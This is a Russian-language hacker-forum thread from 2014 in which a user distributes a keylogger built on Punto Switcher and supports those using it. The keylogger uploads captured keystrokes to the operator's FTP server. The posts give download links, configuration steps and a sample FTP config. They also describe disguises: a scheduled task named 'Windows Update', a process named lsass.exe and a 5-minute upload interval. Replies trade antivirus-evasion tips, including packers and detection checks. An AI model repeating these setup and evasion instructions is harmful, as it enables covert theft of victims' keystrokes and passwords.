1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Keylogger на основе Punto Switcher с отправкой логов на FTP

Тема в разделе "Наши статьи", создана пользователем ww2, 12 авг 2014.

  1. ww2
    ww2 Продвинутый
    Симпатии:
    24
    Всем доброго времени суток

    Представляю Keylogger на основе Punto Switcher с возможностью отправки логов на ваш FTP сервер.

    Скачать c SendSpace
    Скачать c RGhost

    PS: Для настройки нам понадобится 7-Zip, Скачать

    Использование:

    1. Скачиваем архив который я предоставил выше.
    2. Распаковываем архив, идём в папку Configurate-FTP
    3. В файл FTP-config.txt вписываем свои настройки, сохраняем, закрываем.
    4. Кликаем на FTP-Generate.cmd сгенерируется файлик Send.exe
    5. Открываем главный файл FTP.exe в помощью 7-Zip и добавляем в архив наш сгенерированный файл send.exe
    Готово +

    FTP-Config - Образец
    PHP:
    ;Config file
    ;
    set WServer=127.0.0.1
    set WPort
    =21
    set WLogin
    =Anfisa
    set WPass
    =1234567890
    ;
    Дополнительная информация:
    1. Запуск > Копирование файлов в папку профиля
    2. Добавление задачи для планировщика Windows на отсылку логов на FTP сервер.
    3. Отправка каждые 5мин лога на FTP с помощью wput

    PS: Интервал отсылки по умолчанию стоит каждые 5мин, для изменения интервала отправки лога на FTP выполнить действия:
    1. Открываем FTP.exe с помощью 7-Zip
    2. Кликаем один раз на файл install.bat затем нажимаем F4 или извлекаем в любую папку и открываем с помощью блокнота
    3. Строчка 3 изменяем цифру 5 на любое другое число (указывается интервал отправки в минутах)
    PHP:
    set WTime=5
    Имя процесса: lsass.exe
    SSL: поддерживает

    VirusTotal

    Приятного пользования ;)
     
    Последнее редактирование: 18 авг 2014
    12 авг 2014
  2. Colonial0
    Colonial0 Новичок
    Симпатии:
    0
    Плагиатчик *xD* Много троянов наложил в архив? )) Шучу ))
     
    12 авг 2014
  3. lebidon
    lebidon Новичок
    Симпатии:
    1
    При запуске файла 1.ехе с заменённым config.ini на виртуалке, с установленной хр., появляется окно с настройками ps так и должно быть? В диспетчере задач висят процессы cmd.exe, cmd.exe, 1.exe, ftp.exe как то хз… палевно что ли.
     
    13 авг 2014
  4. ww2
    ww2 Продвинутый
    Симпатии:
    24
    Окно с настройками PS подкорректирую чтоб не показывало, отобразило из-за сочетания клавиш занятых в ситеме Ctrl +S как то, отключю горячие клавиши должно норм быть, процессы лишние их можно убить всё равно работать будет, но щас обновлю выложу подкорректированный файлик, без процессов cmd.exe и.т.д.
     
    13 авг 2014
  5. lebidon
    lebidon Новичок
    Симпатии:
    1
    Ещё было бы не плохо, если можно было указывать в конфиге номер порта, на котором весит удалённый FTP сервер. Но в любом случаи спасибо за старания. Сейчас мало кто что-то пишет.
     
    13 авг 2014
  6. Dark Koder
    Dark Koder Новичок
    Симпатии:
    0
    в 7-zip не пакуй, расшыфруют. рар бери
     
    13 авг 2014
  7. lebidon
    lebidon Новичок
    Симпатии:
    1
    Как успехи старина? ;)
     
    16 авг 2014
  8. ww2
    ww2 Продвинутый
    Симпатии:
    24
    Update
    Подправил основной код, убрал лишние процессы, отключил горячие клавиши )


    Dark Koder
    Для упаковки, вместо моего SFX 7z архива можно использовать любой компилятор, например BatToExe

    Чуток попозже выложу основу всю))
     
    Последнее редактирование: 18 авг 2014
    18 авг 2014
  9. lebidon
    lebidon Новичок
    Симпатии:
    1
    Подождал 30 минут логи так и не пришли, :dontknow: проверил конфиг мож, где ошибся вроде всё ровно, хз.
     
    18 авг 2014
  10. XaSa
    XaSa Новичок
    Симпатии:
    5
    Как будто бы rar не распакуют?))))
    Тогда проще паковать bat to exe или ещё какой нибудь подобной хнёй!)

    --------------
    ww2 как антивирусы на такую схему реагируют?
     
    18 авг 2014
  11. ww2
    ww2 Продвинутый
    Симпатии:
    24
    Обнаружил много недофункции в стандартном FTP Client Windows (C:\Windows\System32\ftp.exe)

    Обнаружил глюк Win7 с планировщиком, от имени nt autority\system отказывается запускать файл для отсылки
    На данный момент уберу ссылки на скачивание, т.к. сборка не актуальна при таких проблемах, возможно сегодня к вечеру приготовлю актуальную сборку\обновлю тему :)

    XaSa
    Файлики взял с офф сайта Yandex они с цифровой подписью, пока детект АВ 0
     
    18 авг 2014
  12. lebidon
    lebidon Новичок
    Симпатии:
    1
    Кто то слил уже.

    F-secure 2356 ms Aug 2014 (1 day ago)
    Gen:Variant.Jaiks.187

    Lavasoft 2746 ms Aug 2014
    Gen:Variant.Jaiks.187

    Ikarus 1108 ms Aug 2014
    Trojan-PSW.MSIL.Agent

    Kaspersky 1404 ms Aug 2014
    Trojan.Win32.Generic

    Jiangmin 2668 ms Aug 2014
    Trojan/PSW.MSIL.che
     
    18 авг 2014
  13. ww2
    ww2 Продвинутый
    Симпатии:
    24
    upx палённый
     
    18 авг 2014
  14. ww2
    ww2 Продвинутый
    Симпатии:
    24
    update

    Обновил весь ход истории)

    Изменения:
    1. Переписан весь код распаковки\установки и запуска
    2. Изменён FTP Клиент с стандартного Windows на wput
    Включает поддержку: FTP SSL и возможность указать порт соединения
    3. Директория установки изменена на "%userprofile%\PP"
    4. Исправлены глюки планировщика в Win7 x64
    5. Добавлена возможность указать время отсылки логов
    6. Открытый исходный код
    :)
    VirusTotal

    Ознакомиться с конфигурированием\настройкой, а также скачать можно в 1 посте темы
     
    Последнее редактирование: 18 авг 2014
    18 авг 2014
  15. lebidon
    lebidon Новичок
    Симпатии:
    1
    ww2 Привет! ты сам, на какой системе тестировал?
    Просто на xp не робит, т.е логи так и не идут, а семёрку VM железа не позволяет поставить.
    Запустил FTP Password Sniffer, чтобы траф отследить тоже тишина. Вот такие вот дела. :(
     
    19 авг 2014
  16. ww2
    ww2 Продвинутый
    Симпатии:
    24
    lebidon
    Проверь в службах - Планировщик Windows служба запущена ли ? и есть ли там запись Windows Update ?
    Я тестировал на Windows 7 x64 успешно прошёл тест, после запуска троя нужно напечатать примерно 1 страницу A4 чтобы лог с записями появился, возможно задача есть но он пустой файл не будет отправлять)
     
    19 авг 2014
  17. russian_cc
    russian_cc Новичок
    Симпатии:
    0
    ww2 смотри че прислал в файле с расширением bin:
    RAINН╘╩,  f ЮP⌡Г=кш3y╓ЖP1Е$╩╕Rr(Йыэq^}Ё°╔мрiН═╓п
    ·`СпyЬЛ∙╡⌡fFv═К.ХШH≈ХёPлб,]╦Ь-≥╖┌Г▓tЬ≥ъВ┘н╚П∙Ю%ьнрЮЭ*жЭ└з!█T(╜Ук▒╨цYE▄I÷┐INАI┼ъ√6РS ╞░d╬╩Л_d▐Шоо :Н√мЬHr╒@╧┘▒Вж,{СпвФтЪNу⌠╞Т.╡1M≈д⌠ЧТ"╓ЛГ`5ыm2р≈Г'Ы÷╢▓D²В╜зs÷QЛ(▀▓
    ╓╬▐≈rk`≥3Мъ┤Щ╣уТЮ┘)u ИЩ╣©СcлИ╨ъ─>QЯоWщe╩*Х$^rw ²≤sW░ бL≥ ё5▀е]t┘КFиь6Ё╗╬3▄мШBющD┼УЩ╜∙УЛ{дq`Н  r╔|нGNаfха%т╕,▀╢IЕ╓"^╣^∙pRz$%тEp╜╕U@И°31Ъ∙╥Фж?Pш~√┤=╒\\г┴╒°▓││#2]BИKZ ╢5ХЫ╚AА\├░уБ╣иzД┐
    бsщС,р╛x@▌:╠╪л╩├сa╦<щ Iux.]≈Юm,е┌Ж╓ ОВ╗≥,╬┼s╡┤Ёи5*U▄мю·
    мЯРукd╦яя©┼т╓zпs~⌡nR▄°3Dж2О ≥*ZHUe*УPzзvu}j╣╘tЙT┬к|╬vтсhВ⌠юЁзО╚EАaЯа░yYьф▄в&g│т0и+D
    r─²uИГ}Ч≥ф≈БEбпO1═▌К√╞W ╘,ЛLog6о>р>║d+Э{zл╕}>мы┌]M"К╨jYEМцVюkPnОЛGz╪H╪ЕK²╘4}o╠╘ИЮ≥▒ж=ЁО°┘ГEп⌠w⌠мn═nOЙr╬,щ╝▀}ХХ.WЙД
    ■ DK}╩▒t]©я3╜░n░╝┬D
    ВЫЭ╘║в
    Rц╝2ш9$ещd╜П┌╬╨╙+С│x└.╤°кtДR╠UD-N╟╥)."е
    ╔ПX╞╝aА`└н≥Qцg┴уx╗Оeз≥┌,ыGйг_;┤DО~┐ич░╢ФSr┌▄n|ЙпБ╒`└°|-rSшеы╤9©a)╥<┐&*О÷0█Bж╢6ыФ тu█▓█╫ЩxАэ,Oтцdуй:≥РхCР■Дэ]6┘Б.╨┬┘$┤KМp╢∙Ч·Д2;y<┼N╨ ┴7,╨Д╨L]╫_r╞Ч,аtФСIл²х>VрPYr┴█╓⌠B;
    Я╚4╝Э1∙╘qЪ├┐╘Рm ФLпЕ=╘
    ╬█pT╘]Ш▌Ф╜ ╚аЕяэMОFэs┌∙Имo!≈й╢Eг_]Е~л\≈╝4?n│[П Гоб|E╛╜┌|щЭ)▌75═├Ш╛n÷┐Ft°СоК}]┘L_┘Мс▐═▄НГЖ|ЦЖ\в╧ жцH7Гb M<цкП02┐Я┬╙
    ▄)и÷АldЙИм.@К┐Ь┴╠J│;Ъы0ТE2^дЫ[uЧ÷▐Е@ъ
    d╝°■©)╚Св3&▄≥▀▐~АV8K
    ╥lw╚4ъ#WВ╓}■uPLЖцД5╞ка#к▓│Ъ%*ЫюМ╜╘°{
    ыz~~S){йj▄╛■╦8`цafЩF ╪╙q'@y1Мi[тоqHa-э`╙┤pi*Я╚ф#ь╩╦bШ4R3╨&)7k1╩[о╞P╞у╫m ▒ bзБЯь╕)AБ╛l├A▀ТNC╧KSЫ}NЩютЙ┤mdFrU°Х╫┘~╣+┐├├/■*√≤Ve9Фюц╤WLЧ$╥╩лУ∙╙T>нZ╓f╦б╒ьПD▓.
     
    25 авг 2014
  18. ww2
    ww2 Продвинутый
    Симпатии:
    24
    russian_cc
    Ты его не блокнотом открывай
    Просмотр делать так:
    1. У себя разархивируй архив FTP.exe с помощью 7-Zip в какую нибудь папку, Например: C:\pp\
    2. Присланный файлик diary.dat закинь в папку C:\pp\User Data
    3. Затем запускаем C:\pp\diary.exe для просмотра присланного лога

    PS: в папку User Data ложить файл присланный на FTP, открыть diary.exe для просмотра :)
     
    25 авг 2014
  19. russian_cc
    russian_cc Новичок
    Симпатии:
    0
    по поводу пункта №2, куда должен быть прислан файлик? его нет нигде...

    через 5 мин. файл таки дошол до меня на ftp, скачал положил куда сказали вточности до заглавия символа, не открывается! пишет дневник пуст? в чём причина?
     
    Последнее редактирование: 25 авг 2014
    25 авг 2014
  20. ww2
    ww2 Продвинутый
    Симпатии:
    24
    Дату лога наверху попробуй полистать если файл был запущен ранее
    Лог будет если набрать символов или текста примерно со страницу A4
     
    25 авг 2014

Поделиться этой страницей

Загрузка...